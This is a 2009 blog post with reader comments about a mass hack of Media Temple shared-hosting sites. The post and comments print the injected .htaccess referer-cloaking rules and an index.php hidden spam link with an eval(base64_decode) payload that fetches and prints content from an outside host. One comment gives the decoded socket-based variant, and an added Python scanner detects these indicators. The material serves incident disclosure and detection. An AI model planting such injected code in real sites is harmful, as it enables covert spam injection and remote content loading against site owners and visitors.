Media Temple/WordPress hacked

Update (2009-11-16): Given the large number of Grid-Service accounts hacked in a similar fashion, but not running WordPress, I've updated the title to reflect that this appears to be a MediaTemple problem and not due to WordPress. I still don't have any definitive answers, though, and haven't seen any direct statements from either company.

While moving a WordPress site from Media Temple's Grid-Service (gs) to one of their dedicated virtual (dv) servers today, I noticed some "odd" lines in the root .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC]
RewriteRule .* [R,L]

I immediately knew that this install of WordPress had been compromised, but, prior to deleting the lines, I decided to Google them to find out more information about the problem. I found a good post by Adrian Hanft, which recommended another post by Kyle Brady.

It appears that this exploit is targeted at Media Temple's (gs) account and can also affect Drupal sites. None of the WordPress installs on my (dv) server were affected. All of them were on my (gs) account, including a domain that had Flyspray installed, but not WordPress.

All of the infected domains had the above code in the root .htaccess as well as the following code in the root index.php:

<!--yje35zfv8SU--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="">assparade</a></font>
<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

Some people reported that blog posts were affected and that the posts had to be manually recreated. So far, I have not detected any compromised posts or any other affected files other than .htaccess and index.php.

This exploit has affected people running up to at least version 2.85 of WordPress. Supposedly Media Temple is blaming WordPress and WordPress is blaming Media Temple. Regardless of whose fault it is, if you're running WordPress on Media Temple's Grid-Service, you should check your site out.
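As an added detection example (not from the original post, and not Media Temple's or WordPress's code), the following Python script walks a web root for the two indicators described above: a .htaccess that cloaks on search-engine referers, and an index file carrying the hidden-link font block or an eval(base64_decode(...)) payload, which it decodes to surface the URL the payload fetches. The sample site it builds, the spam.example.invalid host and the payload are constructed for the demo.

```python
import base64
import re
import tempfile
from pathlib import Path

# Indicators taken from the .htaccess and index.php fragments shown on this page.
ENGINES = {"google", "yahoo", "live", "aol", "bing", "msn"}
RE_REFERER = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}\s+\.\*(\w+)\.\*\$\s+\[NC", re.I)
RE_EVAL = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']", re.I)
HIDDEN_FONT = "position: absolute;overflow: hidden;height: 0;width: 0"

def scan_htaccess(text):
    """Search engines the file cloaks on via RewriteCond %{HTTP_REFERER}."""
    return sorted({m.group(1).lower() for m in RE_REFERER.finditer(text)} & ENGINES)

def scan_index(text):
    """Hidden-link marker, plus every URL inside eval(base64_decode(...)) payloads."""
    urls = []
    for m in RE_EVAL.finditer(text):
        decoded = base64.b64decode(m.group(1)).decode("latin-1", "replace")
        urls += re.findall(r"https?://[^\s\"']+", decoded)
    return {"hidden_link": HIDDEN_FONT in text, "callback_urls": urls}

def scan_webroot(root):
    """Walk root and report .htaccess and index.* files carrying either indicator."""
    findings = {}
    for p in Path(root).rglob("*"):
        text = p.read_text(errors="replace") if p.is_file() else ""
        if p.name == ".htaccess" and scan_htaccess(text):
            findings[p.relative_to(root).as_posix()] = {"referer_cloak": scan_htaccess(text)}
        elif p.name in ("index.php", "index.html"):
            r = scan_index(text)
            if r["hidden_link"] or r["callback_urls"]:
                findings[p.relative_to(root).as_posix()] = r
    return findings

def demo():
    """Scan a constructed sample web root (one infected site, one clean); not real files."""
    payload = base64.b64encode(b'$l="http://spam.example.invalid/link.php"; print @implode("", file($l));').decode()
    with tempfile.TemporaryDirectory() as root:
        bad, good = Path(root, "infected"), Path(root, "clean")
        for d in (bad, good):
            d.mkdir()
        (bad / ".htaccess").write_text("RewriteEngine On\nRewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]\n"
                                       "RewriteCond %{HTTP_REFERER} .*msn.*$ [NC]\nRewriteRule .* http://spam.example.invalid/ [R,L]\n")
        (bad / "index.php").write_text('<font style="' + HIDDEN_FONT + '"><a href="">spam</a></font>\n'
                                       '<?php eval(base64_decode("' + payload + '")); ?>\n')
        (good / ".htaccess").write_text("RewriteEngine On\nRewriteRule ^(.*)$ index.php [L]\n")
        (good / "index.php").write_text("<?php require 'wp-blog-header.php'; ?>\n")
        return scan_webroot(root)
```

Run `scan_webroot("/path/to/html")` against a real document root; only the two modified file types the post names are inspected, so extend the name list if an incident touches other files.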

35 thoughts on “Media Temple/WordPress hacked”

  1. My MT Grid Server account was hacked last week. My .htaccess and index.php files had the exact same changes as what you are showing here. When you decode, it points to some site in Asia.

    However, my sites are all Joomla. So, I don’t think it is a vulnerability of Joomla, Drupal or WordPress. Just a few days ago, my Media Temple FTP password was encrypted without asking them to do so. I’m beginning to suspect that they had some type of intrusion.

    Thanks for posting this. You should change the title to just Media Temple Hacked.

    I have 20 websites and each was changed. This means that they most likely had full access to the root of my account.

    If it’s happening to Joomla, Drupal and WordPress sites, then my guess is Media Temple is to blame.

  2. I hate to say “me too,” but me too. Yours was one of two sites that came up when I searched for “yje35zfv8SU” so thank you for your sleuthing and your post. MT did indeed send out a notice that it was changing my passwords so the problem may lie on their end, but wordpress has had its share of troubles lately. Whatever. I’ll fix and upgrade and secure. Thanks for your post.

  4. me too. a client e-mailed me this morning and told me that he had seen strange porn site links in the source code of my site. i have some sites running on mediatemple’s grid service, and most of them use wordpress. updating wp to 2.8.6 alleviated the problem and removed the links, but then i saw that all hand-coded sites had the issue as well. O_O i will look into the issue further now. jeffrey, if there’s any updates on this, please post on your blog! i for sure will call mediatemple today and see if they have any idea about this thing.

  5. I can now confirm that about 80% of my sites at (mt) have been hacked. Info has been added to .htaccess AND index.html/index.php files.

  6. … and I can confirm that WP cannot be blamed, because also hand coded web sites (on domains that have no access to any WP code) have been altered.

    Enough for now. Sites clean again, gotta get some coffee. Good luck, folks!

  7. Thanks for the comments, everyone. I agree with you, Tim; it seems the incident was an FTP hack on Media Temple's end and had nothing to do with WordPress.

    I noticed the same thing, Matt. 90% of the domains/subdomains on my (gs) account were affected. Only my .htaccess and index.html/index.php files were modified, but they were hacked on both hand-coded and WordPress sites. From what I've read, hand-coded, WordPress, Joomla and ExpressionEngine sites were affected. The latter were broken outright and so easy to spot.

    Some people reported that Media Temple notified them of the intrusion via email, but I haven't received anything yet.

  8. Update: Media Temple e-mailed me with these words:

    > Unfortunately, as we are still in the process of due diligence in this security matter so we cannot share more information at this time. We need to follow security protocol to allow any vendors to publish patches and updates before we can publicly announce anything definitive. And, while I agree wholeheartedly with [name deleted --m] that one should use strong passwords at all times, I can assure you that we have not seen any evidence that the malicious content on your server was a result of a brute force attack.

    Hm hm. Time will tell, I guess.

  9. I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but none of them had wordpress installed.

    The encoded PHP evaluates to this:

    if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or stripos($_SERVER['HTTP_USER_AGENT'], 'live'))
    $r = '';
    if($f=@fsockopen('',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost:"))
    while( $l = fread($f, 1024)) $r .= $l;
    $p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);

  10. Pingback: uberVU - social comments

  11. Same thing here… GS customer with an outdated version of Drupal installed, but not in use. I received an email about suspicious FTP use. Sure enough, every one of my domains compromised.

  12. Thanks so much for this post.

    All my wordpress websites were hacked, even though I have so much “security” it’s ridiculous. Stealth Login, Login Lockout, Antivirus and Firewall plugins installed and running on all wordpress sites, plus stupid long passwords that are randomly generated with special characters, numbers and letters.

    Now today I receive an email from MT telling me of suspicious FTP activity on my account overnight, and they’ve disabled my FTP access.

    Except, they haven't disabled it for ALL accounts, just one – which is USELESS.

    So I've removed all FTP from all accounts other than my own, reset the passwords, cleaned all the wordpress installs and .htaccess files.

    I can only hope MT and WP are speaking to each other to find a solution.

  13. me too. i actually got a response from a media temple tech that intimated that all the hacks were done through my server admin account. either I’m misunderstanding and he simply means all the hacks on my (gs) were done via my server admin, or i have to really reassess their security procedures and protocols if my serveradmin account was able to hack other people’s (gs) accounts.

  14. Pingback: Media Temple, WordPress, Mass Hacking | Digging into WordPress

  15. Me too. Mediatemple did not fess up to the vulnerability but after they reset my passwords without my permission (then proceeded to have two hours of downtime so I couldn’t reset my password), I figured it had to be their problem.

    Also, when I called in, they asked me for my password, and they said OK quickly enough to let me know the support guy was looking at a plain text version of my password (he couldn’t have typed it in to check that quickly). This means they don’t store a one-way hash of the password, but the actual password. This is poor, poor security IMHO.

    I’d like a year of paid hosting or an upgrade to DV for the hassle. All my sites were affected and trying to pick through which files were affected and which were not is a royal PITA.

  17. Thanks for the link, Matt. It's definitely worth following and reading.

    According to Media Temple, aaron, they're "not certain this exploit is directly related to the way we were storing passwords," which do appear to be stored in plain text. But I agree with you—if the passwords were not stored as one-way hashes, it was poor security.

  18. Pingback: MediaTemple index.php Analysis –

  19. All my sites hosted with Media Temple were compromised. Both .htaccess and index.php files modified in Joomla or wordpress directories – different accounts. The interesting thing about this is that the perpetrators were able to access the admin control as well and turn on SSH and create a separate admin user. Media Temple surely got caught with their pants down due to lack of security. Whoever crashed this party surely isn’t interested in a reality show – unless their name is Kevin Mitnick.

  21. I got a call from a client this morning saying their Drupal site was down. After finding the problem and this post the issue is exactly the same as what’s posted above.

    The scary thing is that I am on a DV server. Don’t think that this is just a GS issue.

    Just about to contact mediaTemple. I’ll post back if I find out anything extra.

  22. I think it is due to the ‘special source’ that GS uses

    I don’t think it would affect the DV in same way (but long time since I had a DV account)

    Also pixelkitty I get a warning that your site is infected with “Phoenix exploit kit”. I had never heard of this before and googling it, it appears to be a kit to assist in analyzing incoming traffic

    AVG is warning me about the pixelkitty site

    defo a MT GS issue not isolated to wp – it has happened a few times since also

  23. Pingback: Master of My Own Domain - It Got Me Thinking...